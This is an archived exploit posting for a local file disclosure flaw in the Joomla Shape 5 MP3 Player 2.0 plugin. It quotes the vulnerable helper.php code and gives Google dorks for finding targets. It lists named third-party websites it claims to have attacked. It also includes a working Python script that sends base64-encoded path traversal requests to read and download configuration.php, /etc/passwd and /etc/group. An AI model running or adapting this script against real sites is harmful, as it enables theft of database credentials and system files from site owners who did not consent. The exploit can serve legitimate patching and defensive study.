what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Shape 5 MP3 Player 2.0 Local File Disclosure

Joomla Shape 5 MP3 Player 2.0 Local File Disclosure
Posted Dec 14, 2015
Authored by KnocKout

Joomla Shape 5 MP3 Player version 2.0 suffers from a local file disclosure vulnerability.

tags | exploit, local, info disclosure
SHA-256 | 9fc4f80c339f4969c4baad3e0bf59da9dd64faf7366bdfec4b599baaca7a767a

Joomla Shape 5 MP3 Player 2.0 Local File Disclosure

Change Mirror Download
                .__        _____        _______                
| |__ / | |___ __\ _ \_______ ____
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \
| Y \/ ^ /> <\ \_/ \ | \/\ ___/
|___| /\____ |/__/\_ \\_____ /__| \___ >
\/ |__| \/ \/ \/
_____________________________
/ _____/\_ _____/\_ ___ \
\_____ \ | __)_ / \ \/
/ \ | \\ \____
/_______ //_______ / \______ /
\/ \/ \/
Joomla <= (Shape 5 MP3 Player 2.0) Local File Disclosure Exploit
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] Skype : knockoutr@msn.com
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com
[~] Greetz : b3mb4m, ZoRLu, KedAns-Dz ( milw00rm.com )
===================================================================
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Joomla
|~Plugin : Shape 5 MP3 Player 2.0
|~Affected Version : 2.0
|~Software : http://extensions.joomla.org/extension/shape-5-mp3-player
|~RISK : High
|~Google Dork : inurl:"php?fileUrl=" site:ru
|~Google Dork : inurl:plugins/content/s5_media_player
===================================================================
======================Info=========================================
helper.php unconsciously encoded.
This is a very simple security measures, It was exposed to attack.
if base64 encrypting the file names
'fileurl' function is used, and local files will be easily exposed.
============ Error line's in helper.php ===========================
<?php
$path = base64_decode($_REQUEST['fileurl']);
$base = basename($path);
$path1 = str_replace(' ','%20',$path);

header('Content-Description: File Transfer');
header('Content-Type:application/octet-stream');
header('Content-Transfer-Encoding: Binary');
header("Content-disposition: attachment; filename=\"".basename($path)."\"");
header('Content-Length: ' . filesize($path));
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
readfile($path1);
exit;
?>
======================================================================
======================== Tested on Demos ============================
www.kraskinotv.ru
www.alexandra-pavlyuk.ru
www.kovspas.ru
www.asetkz.ru
www.cciheredia.cr
www.helicopterspray.com
www.kpu-karawang.go.id
www.practicalbioethics.org
www.iccfoundation.us
www.mixticius.net
www.stbarnabasdulwich.org
www.ahavathachim.com
www.dcbaptist.org
www.stjohnmansfield.org
www.ilyda.com
www.mountainviewchapel.com
www.biamd.org
www.lavingtonunited.org
www.cypressbible.org
www.brianmcgilloway.com
www.toneside.com
..
etc
..
=======================================================================
================ usage: python h4.py www.site.com ====================

import base64
import sys
import urllib


def exploit():
while True:
print """
[1] = configuration.php
[2] = Try Read /etc/passwd
[3] = Try Read /etc/group
"""
command = raw_input("h4 Console# ")
if command == "1":
command = base64.b64encode("../../../configuration.php")
elif command == "2":
command = base64.b64encode("../../../../../../../../../etc/passwd")
elif command == "3":
command = base64.b64encode("../../../../../../../../../etc/group")
else:
command = base64.b64encode(command)

url = "http://%s/plugins/content/s5_media_player/helper.php?fileurl=%s" % (sys.argv[1],command)

try:
test = urllib.urlopen(url)
if len(test.read()) <= 0:
print "Exploit failed .."
else:
urllib.urlretrieve(url, command)
#wget.download(url)
print "Exploit success ! "
except Exception as e:
print "Unexpected error : %s " % e




if __name__ == '__main__':
if len(sys.argv) > 2:
print "Error usage : python exploit.py website.com"
else:
exploit()
Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close